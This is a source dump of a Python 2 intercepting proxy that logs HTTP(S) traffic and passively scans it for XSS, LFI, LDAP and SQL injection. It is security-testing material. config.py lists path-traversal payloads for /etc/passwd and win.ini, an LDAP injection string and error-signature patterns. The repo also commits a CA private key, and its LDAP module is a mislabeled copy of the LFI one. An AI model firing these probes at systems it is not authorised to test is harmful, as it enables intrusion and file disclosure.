├── Readme.md ├── config.py ├── lib ├── Log.py ├── RedisQueue.py ├── __init__.py ├── pocs │ ├── __init__.py │ ├── ldap.py │ ├── lfi.py │ └── xss.py └── utils.py ├── main.py ├── proxy ├── LoggedProxy.py ├── __init__.py ├── ca.crt ├── ca.key ├── cert.key ├── certs │ └── www.baidu.com.crt ├── models.py └── proxy2.py ├── scanner ├── __init__.py ├── fingerprint.py ├── sqlmap.py └── task.py └── setup_https_intercept.sh /Readme.md: -------------------------------------------------------------------------------- 1 | # LoggedProxy 2 | 3 | 记录流量到数据库中的http(s)代理服务器,支持分布式的被动式漏洞扫描 4 | 5 | 目前完成进度: 6 | 7 | * [x] proxy部分 8 | * [x] 被动扫描主体框架 9 | * [x] 集成反射型XSS的poc 10 | * [x] 集成通过sqlmapAPI进行sql注入检测 -------------------------------------------------------------------------------- /config.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | config={ 3 | 'redis_broker':'redis://localhost:6379/0', 4 | 'redis_backend':'redis://localhost:6379/0', 5 | 'redis_storage':{ 6 | 'host':'127.0.0.1', 7 | 'port':6379, 8 | 'db':1 9 | }, 10 | 'tasks':50, 11 | 'pocs':['xss','lfi','ldap'], 12 | 'poc_path':'/Users/image/PycharmProjects/PScan/lib/pocs/', 13 | 'poc_config':{ 14 | 'xss':{ 15 | 'xss_str':'' 16 | }, 17 | 'lfi':{ 18 | 'requests':''' 19 | ../../../../../../../../../../../../../../../boot.ini 20 | ../../../../../../../../../../../../../../../boot.ini.html 21 | C:\boot.ini 22 | C:\boot.ini 23 | C:\boot.ini.html 24 | %SYSTEMROOT%\win.ini 25 | %SYSTEMROOT%\win.ini 26 | %SYSTEMROOT%\win.ini.html 27 | ../../../../../../../../../../../../../../../etc/passwd%00.html 28 | /etc/passwd%00.html 29 | ../../../../../../../../../../../../../../../etc/passwd 30 | ../../../../../../../../../../../../../../../etc/passwd 31 | ../../../../../../../../../../../../../../../etc/passwd.html 32 | ....//....//....//....//....//....//....//....//....//....//etc/passwd 33 | ../../../../../../../../../../../../../../../../etc/passwd%00 34 | ....//....//....//....//....//....//....//....//....//....//etc/passwd%00 35 | /etc/passwd 36 | https://raw.githubusercontent.com/code-scan/GourdScan/master/README.md? 37 | '''.strip().split("\n"), 38 | 'responces':''' 39 | java.io.FileNotFoundException\: 40 | java.lang.Exception\: 41 | java.lang.IllegalArgumentException\: 42 | java.net.MalformedURLException\: 43 | The server encountered an internal error \(.*\) that prevented it from fulfilling this request. 44 | fread\(\)\: 45 | for inclusion '\(include_path= 46 | Failed opening requiredv 47 | <b>Warning</b>\: file\( 48 | <b>Warning</b>\: file_get_contents\( 49 | root:x\:0\:0\:root\: 50 | Warning\: fopen\( 51 | No such file or directory 52 | # GourdScan 53 | '''.strip().split("\n") 54 | }, 55 | 'ldap':{ 56 | 'requests':''' 57 | ^(%23$!@%23$)(()))****** 58 | '''.strip().split("\n"), 59 | 'responces':''' 60 | supplied argument is not a valid ldap 61 | javax.naming.NameNotFoundException 62 | LDAPException 63 | com.sun.jndi.ldap 64 | Search: Bad search filter 65 | Protocol error occurred 66 | Size limit has exceeded 67 | An inappropriate matching occurred 68 | A constraint violation occurred 69 | The syntax is invalid 70 | Object does not exist 71 | The alias is invalid 72 | The distinguished name has an invalid syntax 73 | The server does not handle directory requests 74 | There was a naming violation 75 | There was an object class violation 76 | Results returned are too large 77 | Unknown error occurred 78 | Local error occurred 79 | The search filter is incorrect 80 | The search filter is invalid 81 | The search filter cannot be recognized 82 | Invalid DN syntax 83 | No Such Object 84 | IPWorksASP.LDAP 85 | Module Products.LDAPMultiPlugins 86 | '''.strip().split("\n") 87 | } 88 | }, 89 | 'enable_sqlmap':True, 90 | 'sqlmap_api':'http://127.0.0.1:8775', 91 | 'sqlmap':{ 92 | 'ban':[] 93 | }, 94 | 'log':{ 95 | "version": 1, 96 | "disable_existing_loggers": False, 97 | 98 | # 日志格式 99 | "formatters": { 100 | "simple": { 101 | "format": "%(asctime)s - %(name)s - %(levelname)s - %(message)s" 102 | } 103 | }, 104 | 105 | "handlers": { 106 | 107 | # 定义控制台日志的级别和样式 108 | "console": { 109 | "class": "logging.StreamHandler", 110 | "level": "DEBUG", 111 | "formatter": "simple", 112 | "stream": "ext://sys.stdout" 113 | }, 114 | 115 | # 定义INFO(以上)级别的日志处理器 116 | "info_file_handler": { 117 | "class": "logging.handlers.RotatingFileHandler", 118 | "level": "INFO", 119 | "formatter": "simple", 120 | "filename": "./logs/info.log", 121 | "maxBytes": 10485760, 122 | "backupCount": 20, 123 | "encoding": "utf8" 124 | }, 125 | 126 | # 定义ERROR以上)级别的日志处理器 127 | "error_file_handler": { 128 | "class": "logging.handlers.RotatingFileHandler", 129 | "level": "ERROR", 130 | "formatter": "simple", 131 | "filename": "./logs/errors.log", 132 | "maxBytes": 10485760, 133 | "backupCount": 20, 134 | "encoding": "utf8" 135 | } 136 | }, 137 | 138 | # 定义不同name的logger的日志配置 139 | "loggers": { 140 | "mymodule": { 141 | "level": "ERROR", 142 | "handlers": [ 143 | "info_file_handler" 144 | ], 145 | "propagate": "no" 146 | } 147 | }, 148 | 149 | # 定义全局日志配置 150 | "root": { 151 | "level": "DEBUG", 152 | "handlers": [ 153 | "console", 154 | "info_file_handler", 155 | "error_file_handler" 156 | ] 157 | } 158 | } 159 | 160 | 161 | } -------------------------------------------------------------------------------- /lib/Log.py: -------------------------------------------------------------------------------- 1 | from config import config 2 | import logging 3 | import logging.config 4 | 5 | logging.config.dictConfig(config['log']) 6 | -------------------------------------------------------------------------------- /lib/RedisQueue.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | from config import config 3 | import redis 4 | 5 | redis_store=redis.StrictRedis(config['redis_storage']) 6 | 7 | class RedisQueue(object): 8 | def __init__(self, name, namespace='queue', **redis_kwargs): 9 | self.key = "%s:%s" % (namespace, name) 10 | 11 | def qsize(self): 12 | return redis_store.llen(self.key) 13 | 14 | def put(self, item): 15 | redis_store.rpush(self.key, item) 16 | 17 | def get_wait(self, timeout=None): 18 | item = redis_store.blpop(self.key, timeout=timeout) 19 | return item 20 | 21 | def get_nowait(self): 22 | item = redis_store.lpop(self.key) 23 | return item 24 | -------------------------------------------------------------------------------- /lib/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imagemlt/LoggedProxy/c35d5412864f8da39e21aa6dbdb38a2482f4283b/lib/__init__.py -------------------------------------------------------------------------------- /lib/pocs/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imagemlt/LoggedProxy/c35d5412864f8da39e21aa6dbdb38a2482f4283b/lib/pocs/__init__.py -------------------------------------------------------------------------------- /lib/pocs/ldap.py: -------------------------------------------------------------------------------- 1 | from lib.utils import * 2 | import requests 3 | import copy 4 | from urllib import urlencode 5 | 6 | 7 | def poc(request,config): 8 | exists = 0 9 | result = '' 10 | try: 11 | reqs = config['requests'] 12 | resp = config['responces'] 13 | headers,cookiesJar=parseHeaders(request['headers']) 14 | url,get_params=url2params(request) 15 | session=requests.session() 16 | for p in get_params: 17 | new_params=copy.copy(get_params) 18 | for fi in reqs: 19 | new_params[p]=fi 20 | new_url=url+'?'+urlencode(new_params) 21 | if(request['method']=='GET'): 22 | back_content=session.get(new_url,cookies=cookiesJar,headers=headers,timeout=5).content 23 | elif(request['method']=='POST'): 24 | back_content=session.post(new_url,cookies=cookiesJar,headers=headers,timeout=5).content 25 | for res in resp: 26 | if res in back_content: 27 | exists+=1 28 | result+='lfi found:get param %s\n'%p 29 | except Exception,e: 30 | print (e.message) 31 | finally: 32 | return exists,result 33 | 34 | if __name__=='__main__': 35 | print poc({'url':"http://127.0.0.1:5555/echo.php?1=a",'headers':{},'method':'GET'},{'xss_str':'mdzz'}) -------------------------------------------------------------------------------- /lib/pocs/lfi.py: -------------------------------------------------------------------------------- 1 | from lib.utils import * 2 | import requests 3 | import copy 4 | from urllib import urlencode 5 | 6 | 7 | def poc(request,config): 8 | exists = 0 9 | result = '' 10 | try: 11 | reqs = config['requests'] 12 | resp = config['responces'] 13 | headers,cookiesJar=parseHeaders(request['headers']) 14 | url,get_params=url2params(request) 15 | session=requests.session() 16 | for p in get_params: 17 | new_params=copy.copy(get_params) 18 | for fi in reqs: 19 | new_params[p]=fi 20 | new_url=url+'?'+urlencode(new_params) 21 | if(request['method']=='GET'): 22 | back_content=session.get(new_url,cookies=cookiesJar,headers=headers,timeout=5).content 23 | elif(request['method']=='POST'): 24 | back_content=session.post(new_url,cookies=cookiesJar,headers=headers,timeout=5).content 25 | for res in resp: 26 | if res in back_content: 27 | exists+=1 28 | result+='lfi found:get param %s\n'%p 29 | except Exception,e: 30 | print (e.message) 31 | finally: 32 | return exists,result 33 | 34 | if __name__=='__main__': 35 | print poc({'url':"http://127.0.0.1:5555/echo.php?1=a",'headers':{},'method':'GET'},{'xss_str':'mdzz'}) -------------------------------------------------------------------------------- /lib/pocs/xss.py: -------------------------------------------------------------------------------- 1 | from lib.utils import * 2 | import requests 3 | import copy 4 | from urllib import urlencode 5 | 6 | 7 | def poc(request,config): 8 | exists = 0 9 | result = '' 10 | try: 11 | xss_str = config['xss_str'] 12 | headers,cookiesJar=parseHeaders(request['headers']) 13 | url,get_params=url2params(request) 14 | session=requests.session() 15 | for p in get_params: 16 | new_params=copy.copy(get_params) 17 | new_params[p]=xss_str 18 | new_url=url+'?'+urlencode(new_params) 19 | if(request['method']=='GET'): 20 | back_content=session.get(new_url,cookies=cookiesJar,headers=headers,timeout=5).content 21 | elif(request['method']=='POST'): 22 | back_content=session.post(new_url,cookies=cookiesJar,headers=headers,timeout=5).content 23 | if xss_str in back_content: 24 | exists+=1 25 | result+='xss found:get param %s\n'%p 26 | except Exception,e: 27 | print (e.message) 28 | finally: 29 | return exists,result 30 | 31 | if __name__=='__main__': 32 | print poc({'url':"http://127.0.0.1:5555/echo.php?1=a",'headers':{},'method':'GET'},{'xss_str':'mdzz'}) -------------------------------------------------------------------------------- /lib/utils.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | import urlparse 4 | def cookie2jar(cookies): 5 | cookie=cookies.strip(';').split(';') 6 | cookie_dict={} 7 | for cook in cookie: 8 | k,v=cook.strip().split('=',1) 9 | cookie_dict[k]=v 10 | cookiesJar=requests.utils.cookiejar_from_dict(cookie_dict,cookiejar=None,overwrite=True) 11 | return cookiesJar 12 | 13 | def parseHeaders(headers): 14 | heads={} 15 | cookiesJar=None 16 | for head in headers: 17 | if(head != 'Cookie'): 18 | heads[head]=headers[head] 19 | else: 20 | cookiesJar=cookie2jar(headers[head]) 21 | return heads,cookiesJar 22 | 23 | def req2file(request): 24 | result=request['requestline'] 25 | for head in request['headers']: 26 | result=result+"\r\n"+head+":"+request['headers'][head] 27 | result=result+"\r\n\r\n"+request['req_body'] 28 | return result 29 | 30 | 31 | def url2params(request): 32 | url=request['url'].split('?',1) 33 | query = urlparse.urlparse(request['url']).query 34 | return url[0],dict([(k, v[0]) for k, v in urlparse.parse_qs(query).items()]) 35 | 36 | -------------------------------------------------------------------------------- /main.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | from proxy import LoggedProxy 3 | from proxy.models import * 4 | from config import config 5 | from scanner.task import scan, sqlmap_scan 6 | from scanner.fingerprint import gen_fingerprint 7 | from lib.Log import * 8 | from scanner.sqlmap import * 9 | from collections import Iterable 10 | import json 11 | import Queue 12 | import threading 13 | import ctypes 14 | import inspect 15 | 16 | 17 | scan_tasks=Queue.Queue(config['tasks']) 18 | terminate_mark=False 19 | 20 | def _async_raise(tid, exctype): 21 | """raises the exception, performs cleanup if needed""" 22 | tid = ctypes.c_long(tid) 23 | if not inspect.isclass(exctype): 24 | exctype = type(exctype) 25 | res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, ctypes.py_object(exctype)) 26 | if res == 0: 27 | raise ValueError("invalid thread id") 28 | elif res != 1: 29 | # """if it returns a number greater than one, you're in trouble, 30 | # and you should call it again with exc=NULL to revert the effect""" 31 | ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None) 32 | raise SystemError("PyThreadState_SetAsyncExc failed") 33 | 34 | 35 | def stop_thread(thread): 36 | _async_raise(thread.ident, SystemExit) 37 | 38 | 39 | 40 | 41 | def proxy_service(): 42 | LoggedProxy.test(HandlerClass=LoggedProxy.LogRequestHandler) 43 | 44 | def task_service(): 45 | while(True): 46 | if terminate_mark: 47 | break 48 | try: 49 | task_count=scan_tasks.qsize() 50 | session=DBSession() 51 | Logs=session.query(Log).filter(Log.sended==False).limit(config['tasks']-task_count).all() 52 | if isinstance(Logs,Iterable): 53 | for l in Logs: 54 | request={ 55 | 'id':l.id, 56 | 'method':l.method, 57 | 'url':l.url, 58 | 'requestline':l.requestline, 59 | 'headers':json.loads(l.headers), 60 | 'req_body':l.req_body, 61 | 'time':l.time, 62 | 'sended':l.sended, 63 | 'dealed':l.dealed 64 | } 65 | logging.info("%s,%s"%(request['method'],request['url'])) 66 | for poc in config['pocs']: 67 | scan_tasks.put(scan.delay(request,poc)) 68 | if(config['enable_sqlmap']): 69 | scan_tasks.put(sqlmap_scan.delay(request)) 70 | l.sended=True 71 | session.commit() 72 | except Exception,e: 73 | logging.error(e.message) 74 | 75 | def result_service(): 76 | session=DBSession() 77 | while(True): 78 | if terminate_mark: 79 | break 80 | try: 81 | job=scan_tasks.get() 82 | if job.ready(): 83 | result=job.get() 84 | logging.debug(result) 85 | if(not result['exists'] and result['found']>0): 86 | res=Result() 87 | res.fingerprint=gen_fingerprint(result['request'],result['type']) 88 | res.type=result['type'] 89 | res.requestId=result['request']['id'] 90 | res.result=json.dumps(result['result']) 91 | session.add(res) 92 | session.commit() 93 | session.query(Log).filter(Log.id==result['request']['id']).update({'dealed':True}) 94 | else: 95 | scan_tasks.put(job) 96 | session.commit() 97 | except Exception,e: 98 | logging.error(e.message) 99 | 100 | 101 | if __name__=='__main__': 102 | task_thread=threading.Thread(target=task_service) 103 | result_thread=threading.Thread(target=result_service) 104 | proxy_thread=threading.Thread(target=proxy_service) 105 | task_thread.start() 106 | 107 | result_thread.start() 108 | proxy_thread.start() 109 | threads=[task_thread,result_thread,proxy_thread] 110 | try: 111 | while True: 112 | for thread in threads: 113 | if not thread.isAlive(): 114 | logging.error("thread %s terminated,trying to recall it"%(thread.getName())) 115 | logging.info("recall thread %s succeed"%(thread.getName())) 116 | except KeyboardInterrupt,e: 117 | logging.error('user termiated') 118 | for thread in threads: 119 | stop_thread(thread) 120 | 121 | -------------------------------------------------------------------------------- /proxy/LoggedProxy.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | from models import * 3 | from proxy2 import * 4 | import json 5 | 6 | 7 | class LogRequestHandler(ProxyRequestHandler): 8 | def request_handler(self, req, req_body): 9 | session=DBSession() 10 | log=Log() 11 | log.method=req.command 12 | log.url=req.path 13 | log.requestline=req.raw_requestline 14 | log.headers=json.dumps(dict(req.headers)) 15 | log.req_body=req_body 16 | session.add(log) 17 | session.commit() 18 | session.close() 19 | 20 | def test(HandlerClass=ProxyRequestHandler, ServerClass=ThreadingHTTPServer, protocol="HTTP/1.1"): 21 | if sys.argv[1:]: 22 | ip=sys.argv[1] 23 | port = int(sys.argv[2]) 24 | else: 25 | ip="::1" 26 | port = 5678 27 | server_address = (ip, port) 28 | 29 | HandlerClass.protocol_version = protocol 30 | httpd = ServerClass(server_address, HandlerClass) 31 | 32 | sa = httpd.socket.getsockname() 33 | print "Serving HTTP Proxy on", sa[0], "port", sa[1], "..." 34 | httpd.serve_forever() 35 | 36 | if __name__ == '__main__': 37 | test(HandlerClass=LogRequestHandler) 38 | -------------------------------------------------------------------------------- /proxy/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imagemlt/LoggedProxy/c35d5412864f8da39e21aa6dbdb38a2482f4283b/proxy/__init__.py -------------------------------------------------------------------------------- /proxy/ca.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIICpDCCAYwCCQDcHOPdAQicbTANBgkqhkiG9w0BAQsFADAUMRIwEAYDVQQDDAlw 3 | cm94eTIgQ0EwHhcNMTkwMjE2MDEzMDM4WhcNMjkwMjEzMDEzMDM4WjAUMRIwEAYD 4 | VQQDDAlwcm94eTIgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCz 5 | 7pGDAbL09jkt+fyD5Y5gh3sv8y6f3KO2cDprcvl127GYjcgnuSl2W1618NbPulxc 6 | TSmw37uwbrlbk/WzhdzfSghOdO1tmYRn2RTyvrt1pUyFiF8Wxn1ZzlxcP50PIiw0 7 | BHWTvFL7Y53gUUs1sh8qBMMLRBtTNd48gPdVdnsd4FmEamuuoW4zN1VXtXbrqPna 8 | rAlsuKV2oBQEPBhY8Tai+1QWUMyoqQ0kTX5pLeOuuztU5V+XnCF4wmHxlA1vlHNr 9 | Qz0v4QqHifGbYh5X/dITa2h2/PlYN+++Sy6Yp/471NFU9B/QMinyAoiRyvJkbPCx 10 | GFjY1cR3IzuuXo951d55AgMBAAEwDQYJKoZIhvcNAQELBQADggEBAIRyWkuA7ClW 11 | rp+Gw1nNwTAtTL+0nM3m05NEtHh2oU5p1xOCB/8JK2wO5SqhEN3j17fIrJWQ3JXZ 12 | WotmHVYLSO4VWenj6Tmt6k74AIpRrHZumA5siVN4432Cizox67MnnI+576ufPxDi 13 | BSR4ds0/NqcFjlItAlY21bV7SQVNFkBUytr4H9rKFtx73dl4S3+dsuLJqHb/2t2/ 14 | ET5wwytAsnd0qRJAlU6P4euoCqnitNbSkKa8Fa+TFbrpGVX/Ie/rb5c8RIzA/L4J 15 | Lz3nGo/DhtR1+xyXynqA+3gdIPkTf5ksCw/C4V86TnmVrnkILeZAYKe0QQJopOCq 16 | 4r9oY0HBd8g= 17 | -----END CERTIFICATE----- 18 | -------------------------------------------------------------------------------- /proxy/ca.key: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIIEowIBAAKCAQEAs+6RgwGy9PY5Lfn8g+WOYId7L/Mun9yjtnA6a3L5dduxmI3I 3 | J7kpdltetfDWz7pcXE0psN+7sG65W5P1s4Xc30oITnTtbZmEZ9kU8r67daVMhYhf 4 | FsZ9Wc5cXD+dDyIsNAR1k7xS+2Od4FFLNbIfKgTDC0QbUzXePID3VXZ7HeBZhGpr 5 | rqFuMzdVV7V266j52qwJbLildqAUBDwYWPE2ovtUFlDMqKkNJE1+aS3jrrs7VOVf 6 | l5wheMJh8ZQNb5Rza0M9L+EKh4nxm2IeV/3SE2todvz5WDfvvksumKf+O9TRVPQf 7 | 0DIp8gKIkcryZGzwsRhY2NXEdyM7rl6PedXeeQIDAQABAoIBAGGfLTmb4WFAedN1 8 | D0jscivzNaXVVdWMGxKvnzKO5cPJF3kCa7cJofJCLoeeDJ4VqWi2wMjjCmz2FgEW 9 | rLbjCOvoucr/a5YMNac2Q0RUsVZqAbNtQtITjQz9hmTSar88NilexgAKrCcSbCS5 10 | Vonig0AD52KkaALkdhfzjL3Ek5WoKxu0PF6jhRDeGNIzmkhi9yNqypWMzFVizydR 11 | eWsiZw6W74eop2qHKoNwVf2gKzD06Jd8y8iqqSIOs6Tb/U95oLXU9aM6+LyyngC3 12 | jYBYOok70uRoM9TY6/tr4yP/MhDBoQPLIVWivLEgpck0lnno79C4aHvmqPLTDERG 13 | DYZhIMUCgYEA4ZT+dNA/ZsvWColXUCZ9SATNXz7E4k8AdCAH6oFEOCZYlPQOIUO6 14 | 4K5PPKFC3kVrgQ7lqQ1VjS+22xc8RBRkBvtd6heNSlSvO9d6l2j3gixkuDXOLTvM 15 | KxFhBr4qiKURiQ8687C+PmCwQ/0/EmwMiofY0XcDMStGYWNoUS0AMg8CgYEAzDHA 16 | Cr97iiP5p5gDnmwWQAqSeGJFDECIkw2tRAGJQNxrsmD9etLfduFDQYAbZbTg/Ce0 17 | +I7hXCiPppelwD7HkNIz9q93WoMqHiTqnTtfTv3wsUZ7KbMc1PdGMVRBnWsFBG0t 18 | OxBecOvvNwY2cgjIHrpkhPt9+QKkRtkCg1tLTvcCgYEAxXwIn/9H4hiFE8hUtghc 19 | GVaK7N0ow+7huMfp5jSwom9/kTdvv1NqIRS4rZ2Hysr/aIbALBVOVkH1VSysR/WJ 20 | 9ErPVwazXOVyW3MzEaaFOGLg8hu4mgUFopaeWKbW2bWY+mJo+7o5cqZ26a6lLt2E 21 | xSpUeFw2YS8/eDbstlQtHaUCgYBYNxIJUqozhtE/ZzwBAB8osaiPm5zK60JVjW4S 22 | WDuMqu1YFfDMVDe4ax8cOBUd/mPIa/sR+uA/aUKOLSutfzHGThmm9C0zDEFw3nAB 23 | V3oYbTrDy3hADqJhGybW/tiOAoMbY3NL9glm7XbeJa/12fdi1xHAJcpJfqur8+rT 24 | BujlBwKBgHOz9G3KiXWpHi6EUyN4IW7aUJQDlPDDPz6DNW0nrBtsmXFSFy6JiFzp 25 | 9J1mq8TcwJCUHnBE/H6zzbZwr0E4bVAQFIleFbunSct822ix8J4DxX3NOlb6g2tk 26 | 92K+9vM0+mfFWiwjeRy/7GU2eJnpG8G2cOKrCufGTpDRweVcicWD 27 | -----END RSA PRIVATE KEY----- 28 | -------------------------------------------------------------------------------- /proxy/cert.key: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIIEpAIBAAKCAQEAtZ8RFyqqGqRLVDbXrO9n+bPa0wTVBMGZ+I5Lto37gNs/7ZKe 3 | pTPoEBzQg6j/eMdHbpTPyurYMtJP1Tc43rxJOh+wPk1EPtb2MiHdtWmZ1vkUmmrv 4 | tqOVuf16kP9LKyZdhuReNlutGSrrddnIpmBg2rpahIwo7l9nBXSwnvNjSiYMWvwe 5 | PbCi+NlRMiIZ1mS4Aey6vkQevvkv5AH/+Ra/qu+I+dsFcj6T6hkrPt0bPXcXnXAb 6 | mEF/oZ8hj3dSOCgN1a5YmyvtX1cXfv/ghqSj2RSS1pom6K0opZmXibBo2MyfrwP+ 7 | 06vJv4AeQ8FmiQ9+89hAdVGN4uy7zmPrxxU9iwIDAQABAoIBAQCADid+rhZBspVq 8 | S0DGLgahiK5BGqcXM2ncVngLvxAVSoFIgJha4r48nhRmwEFgZyF2VnYsHGlTa/Xd 9 | 35G5eggnczBQvSnhJK9xqW8o+cv+RqDAP6XEoJJxEMfadCYLxoErGtlSelER7bEW 10 | 5vcSV+HyVnJ8AlbZu2pn7l6ZtAHNxNQwPiHe4GgjqkjxX4SbbtSqSP7USs/p/wfV 11 | n5FgsCyHe/NKjXAU4gh1t5RkAVOpaJnlXyyWE+EPs3NKY0CSzITSjx+WI+zX0ksa 12 | p+bBSgFCra92Rxf+i3QPsLzRaftXADd5qxTvwMzODFerDK6TpQYN4+69W0sH7tnc 13 | iNbIpwwBAoGBAO+QLKb51L+6RTYkGjnvMFctnwZatBDpG0IfxBpbhpqvg+JfX/CS 14 | xu5BhP1O0gxA0y9Ph6Uy49WoRBm36U3dg3JY7DCdNdZMeVpBmwiTNut3BM71nWMY 15 | t19ycXmP80abQMklO99icTQhCCPt2p2fWmSVpMmFT8dLP661Il0N3rMVAoGBAMIV 16 | KzMG3DQQYd00zzLmkKeasuJSIqVMkLX8C6+4JbM2DhK2Ih0xRdg7BCrywmrwQEE5 17 | YaBLesmwM01ZjqpZJvVgSEK7oxqkmXfZehwnoomCbAfB1mRmz5EG/G+Dzm/izP+z 18 | yMBEyX7YH9XcyqG7JmxYpl05WPQjDl7w/1K0QtYfAoGAGnNMutLyzoh+g8/QpXzn 19 | VXjQCh+RqhxSyiY/vLlGT2X5pdDqAuHx3PSW/nDpeDjgGGUrkO3hggGmI0DPHa3L 20 | iaCP035IJ3UiIPkFaRj4A1+MxF0SF5LvDDbSmJ1wOueBa7QUvEFeRmcvQuhMLwMd 21 | M+Xh3+48NMD2MxAEz0lswVECgYBg+AKldAABY04CH6iGXfxYQUqvGSqGPELxKgUM 22 | vozXhWJypt1UiJHE/3eNnczVcUQpUmoclJm8u3RmaSCGrBRy9LAl52oOnb6vytDf 23 | 0E29NpSTK53afCOo6jyl2s0ByedyunjK15N09LazO6ViOQdxirlUSprPH9TGStLG 24 | l5ntMQKBgQDP9cdgy2vuyd2BtaQCjjs+pdLe5YYhJu0D6BEUqhxSXqwGk+lAI6tV 25 | TJHJUdNzm3KC8SuQyG+9B/Yfxnm4A19xbWqUx3Edda5XWPjUugtQcMC0wj5eIFH6 26 | 9SF9sQLQYkcuZKG0HC3SYQmYlokzZMLoetXWTT0khLN5Hic11i3lMw== 27 | -----END RSA PRIVATE KEY----- 28 | -------------------------------------------------------------------------------- /proxy/certs/www.baidu.com.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIICpTCCAY0CBgFo8+6TbjANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDDAlwcm94 3 | eTIgQ0EwHhcNMTkwMjE2MDEzMjA1WhcNMjkwMjEzMDEzMjA1WjAYMRYwFAYDVQQD 4 | DA13d3cuYmFpZHUuY29tMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA 5 | tZ8RFyqqGqRLVDbXrO9n+bPa0wTVBMGZ+I5Lto37gNs/7ZKepTPoEBzQg6j/eMdH 6 | bpTPyurYMtJP1Tc43rxJOh+wPk1EPtb2MiHdtWmZ1vkUmmrvtqOVuf16kP9LKyZd 7 | huReNlutGSrrddnIpmBg2rpahIwo7l9nBXSwnvNjSiYMWvwePbCi+NlRMiIZ1mS4 8 | Aey6vkQevvkv5AH/+Ra/qu+I+dsFcj6T6hkrPt0bPXcXnXAbmEF/oZ8hj3dSOCgN 9 | 1a5YmyvtX1cXfv/ghqSj2RSS1pom6K0opZmXibBo2MyfrwP+06vJv4AeQ8FmiQ9+ 10 | 89hAdVGN4uy7zmPrxxU9iwIDAQABMA0GCSqGSIb3DQEBBQUAA4IBAQBc5BnB9xjy 11 | W2XuYnSWHXKaZ6D1VbROeVMgQIoHlfLxjt65YSh2dp6KAgJ30J3MBKmi6w4tGkJx 12 | 13xHiIGXQNZSeepfLG3OQH0hhA+b96g5/PfAlgNv6ym8b/kw++w5DXWMMeCexQB4 13 | v4mAlGQC9Kkmz27LimGqfZpf7JHmY9A1udfUtRjixsodiyfzQpzt1PTtUVr79lIl 14 | l9C0e1oBUsZS0K54c1rjxlNaOa5JadgJxdXfdnJQvsaCEgwGlRkd8PT/aJz7gntO 15 | +/t3j/u2h2TKNn7jhzM06YJGi5qHEzX09N8A4LC+02gEJjuzE7ZzIyHzSwOsgMsI 16 | X9nvR62LN4dg 17 | -----END CERTIFICATE----- 18 | -------------------------------------------------------------------------------- /proxy/models.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | from sqlalchemy import Column, String, Text, DateTime, Integer, Boolean, BLOB, ForeignKey, create_engine 3 | from sqlalchemy.orm import sessionmaker 4 | from sqlalchemy.ext.declarative import declarative_base 5 | import datetime 6 | 7 | Base = declarative_base() 8 | 9 | class Log(Base): 10 | # 表示请求记录 11 | __tablename__ = 'Log' 12 | 13 | # 表结构 14 | 15 | id=Column(Integer,primary_key=True,autoincrement=True) 16 | method=Column(String(20)) # 请求方法 17 | url=Column(String(1024)) 18 | requestline=Column(String(1024)) 19 | headers=Column(String(1024)) 20 | req_body=Column(BLOB,nullable=True) 21 | time=Column(DateTime,default=datetime.datetime.utcnow()) 22 | sended=Column(Boolean,default=False) 23 | dealed=Column(Boolean,default=False) 24 | 25 | class Result(Base): 26 | __tablename__='Result' 27 | 28 | id=Column(Integer,primary_key=True,autoincrement=True) 29 | requestId=Column(Integer,ForeignKey('Log.id')) 30 | fingerprint=Column(String(1024)) 31 | type=Column(String(20)) 32 | time = Column(DateTime, default=datetime.datetime.utcnow()) 33 | result=Column(Text) 34 | 35 | 36 | class Rule(Base): 37 | __tablename__='Rule' 38 | 39 | id=Column(Integer,primary_key=True,autoincrement=True) 40 | type=Column(String(10)) 41 | rule=Column(Text) 42 | 43 | 44 | engine=create_engine('sqlite:////tmp/log.db') 45 | 46 | Base.metadata.create_all(engine) 47 | 48 | DBSession =sessionmaker(bind=engine) 49 | 50 | 51 | -------------------------------------------------------------------------------- /proxy/proxy2.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import sys 3 | import os 4 | import socket 5 | import ssl 6 | import select 7 | import httplib 8 | import urlparse 9 | import threading 10 | import gzip 11 | import zlib 12 | import time 13 | import json 14 | import re 15 | from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler 16 | from SocketServer import ThreadingMixIn 17 | from cStringIO import StringIO 18 | from subprocess import Popen, PIPE 19 | from HTMLParser import HTMLParser 20 | 21 | 22 | def with_color(c, s): 23 | return "\x1b[%dm%s\x1b[0m" % (c, s) 24 | 25 | def join_with_script_dir(path): 26 | return os.path.join(os.path.dirname(os.path.abspath(__file__)), path) 27 | 28 | 29 | class ThreadingHTTPServer(ThreadingMixIn, HTTPServer): 30 | address_family = socket.AF_INET6 31 | daemon_threads = True 32 | 33 | def handle_error(self, request, client_address): 34 | # surpress socket/ssl related errors 35 | cls, e = sys.exc_info()[:2] 36 | if cls is socket.error or cls is ssl.SSLError: 37 | pass 38 | else: 39 | return HTTPServer.handle_error(self, request, client_address) 40 | 41 | 42 | class ProxyRequestHandler(BaseHTTPRequestHandler): 43 | cakey = join_with_script_dir('ca.key') 44 | cacert = join_with_script_dir('ca.crt') 45 | certkey = join_with_script_dir('cert.key') 46 | certdir = join_with_script_dir('certs/') 47 | timeout = 5 48 | lock = threading.Lock() 49 | 50 | def __init__(self, 